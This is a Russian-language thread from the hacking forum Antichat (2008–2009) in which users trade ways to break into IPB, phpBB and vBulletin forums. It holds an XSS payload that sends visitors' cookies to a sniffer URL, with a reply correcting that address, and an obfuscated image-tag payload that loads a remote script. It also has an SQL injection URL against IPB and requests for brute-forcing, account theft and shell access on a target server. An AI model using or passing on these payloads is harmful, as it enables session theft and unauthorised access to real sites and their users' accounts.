ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости CMS / форумов (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Общие вопросы по взлому форумов... (https://forum.antichat.xyz/showthread.php?t=11208)

brlamo 24.06.2008 05:41

Цитата:

Сообщение от fht
Вариант #2.
Заходишь на форум который в дальнейшем будет играть роль твоей жертвы. Пытаешся узнать версию и производителя форума

В случае Ipb как узнать версию форума?

n0ne 24.06.2008 08:06

brlamo, https://forum.antichat.ru/thread11615.html

https://forum.antichat.ru/thread15678.html

ac1D 24.06.2008 11:12

такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?

Серенький 24.06.2008 20:27

Цитата:

такой вопрос: если у меня снизу страницы форума написано Powered by PN_phpBB_14 version 1.7.3.2, то какая версия форума? 1,7,3,2 или какая-то другая?
это модуль форума к PostNuke, версии 1.7.3.
Цитата:

http://postnuke.ru/modules.php?op=modload&name=phpBB_14&file=index&ac tion=viewforum&forum=64

ac1D 25.06.2008 19:23

Цитата:

Сообщение от Серенький
это модуль форума к PostNuke, версии 1.7.3.

а тут есть оюзор его узявимостей, просто в прикрепленных темах что-то не нашел такого

Gianni 12.07.2008 11:09

помогите использовать уязвимость в 2.0.20.. чо то я с этим аватарам.. не понимаю как чо делать

TehRn 16.07.2008 15:25

взлом форума ipb 1.3
 
скажите правильно, ли я всё зделал

создал тему и в посте написал (без звёздочек) :
Код:

[em*ail]wj@wj[ur*l=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+docu*ment.cookie);`

А на снифер ни чего неприходит

почему?

aka PSIH 16.07.2008 15:31

адрес сниффера http://old.antichat.ru/cgi-bin/s.jpg

TehRn 16.07.2008 17:47

спс огромное помогло!

еще вопрос: а ,если код поместить в подпись он будет работать?

OMG!! 16.07.2008 18:01

Что можно сделать с Ipb 2.1.7 ? ведь это одна из самых взломостойких версий.. в идеале нужен шелл ) паролей до админки пока нет. ремоут пасс чейнджер (эксплоит на перле что ли ) не работает ( видимо патченный форум . )

Ershik 16.07.2008 18:28

OMG!!, а если попробовать поискать на milw0rm.com или Securitylab.ru эксплоиты? Какие цели ты преследуешь? Поломать любыми способами? Или утянуть хеш администратора?

OMG!! 16.07.2008 18:55

Ershik, являясь администратором ресурсов в своей сети.. хеш админа на этом форуме у меня есть.. буду надеятся, что он совпадет с админкой на его форуме.. но хеш жесток, и пока его не взломали. Цель - получить доступ к кое-чему на этом сервере. Самое дырявое на том ресурсе - пожалуй сайт на джумле ( проверял все компоненты.. ничего путного нет ) и этот форум.. :-) вот..

LamerNAH 17.07.2008 21:55

Я не понял 1)xss(активные и пассивные)
Смотрите значит я пишу просто пост вставляю этот когд потом юзер что должен сделать? нажать на мой пост или нажать на тот код или как? и потом на какой снифер должны прийти кукис? как я с того снифера смогу их достать?

sabe 22.07.2008 21:53

hi мне на форуме нужно 200 постов чтоб инфу читать..
Цитата:

allcheats.ru/t47219/
мне бы любой акк с 200 месагами..
стоит булка переделанная, брут будет долго... хсс.. чтот не разкрутил..модулей не обнаружил.
короче) вопрос КАК можно чтото сделать?


OMG!!
IPB 2.1.7 remote password changer будет работать только есть debug level = 3
осталась скуля:
Цитата:

index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&star ter=1+union+select+1/*
и хсс:
Цитата:

[img]http://www.vital.h.com.ua/[snapback] onerror=script=document.createElement(String.fromC harCode(115,99,114,
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
head=document.getElementsByTagName(String.fromChar Code(104,101,97,100)).item(0),head.appendChild(scr ipt)
style=visibility:hidden =[/snapback].gif[/img]

mash16 01.08.2008 00:03

Знатоки,помогите:

forum/weblogs_news.php?=&order=&start=-20

пишет:

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20, 20' at line 7

SELECT e.entry_id, e.entry_access, e.entry_subject, e.entry_time, e.entry_views, e.entry_poster_id, e.entry_text, e.bbcode_uid, e.entry_mood, e.entry_currently, e.currently_text, e.entry_replies, u.user_id, u.username FROM weblog_entries AS e, users AS u WHERE entry_access <= 0 AND e.entry_poster_id = u.user_id AND e.entry_deleted <> 1 ORDER BY entry_id DESC LIMIT -20, 20

Line : 150
File : weblogs_news.php

здесь можно сделать SQL inj?

sabe 01.08.2008 23:22

mash16
иньекция как я понимаю в лимите..

kentuss 06.11.2008 17:38

как узнать пароль админа на форуме Invision Power Board v1.3.1 Final ?? помогите плиз

RomaM65 02.12.2008 15:29

Люди а не подскажете как можно брутить форумы на phpBB а то у меня акк угнали а я надеюсь вернуть брутом или чем нить другим я лично форум ломать не хочу а только свой акк вернуть
Плизз поделитесь опыцтом в етих делах с чего начать или кратко поясните

AzzkyAspid 15.12.2008 18:29

Товарищи, прошу помочь!

Дано: форум Bulletin® v3.8.0 Release Candidate 1, мой аккаунт с правами юзера.

Необходимо: удалить свой профиль.

Решение: как????

Доп.инфа: облазил всю вкладку Мой кабинет - нет и намека на кнопку "Удалить профиль".

1ce666 16.12.2008 02:55

Можно как нибудь угнать акк на двиге VBulletin 3.6.6 ???

web64x 14.01.2009 12:12

Такая проблема.
Я сделал заказ на создание сайта под ключ , у меня есть проект игровой базы. Не подумайте, что для меня изготовление сайта какая-та сложность, просто Москва слишком большой город с большими возможностями, всего сам не успеешь сделать, приходится выбирать и ставить приоритеты. Так, вот собственно вопрос. Где лучше хранить мой объм, снимать место на серваке или воспользоваться файлобменником? И если всё же файлобменником, то как обезопасится от того, чтобы ссылки на хранимые мною файлы не менялись?
Заранее спасибо за ответ.

Nervtik 28.01.2009 13:32

http://leninogorsk.ru/forum/index.php?sid= что тут можно сделать??? Подскажите Нач...у С Меня причетается по червонцу.... ))) (за оказанную пом....)


Время: 22:53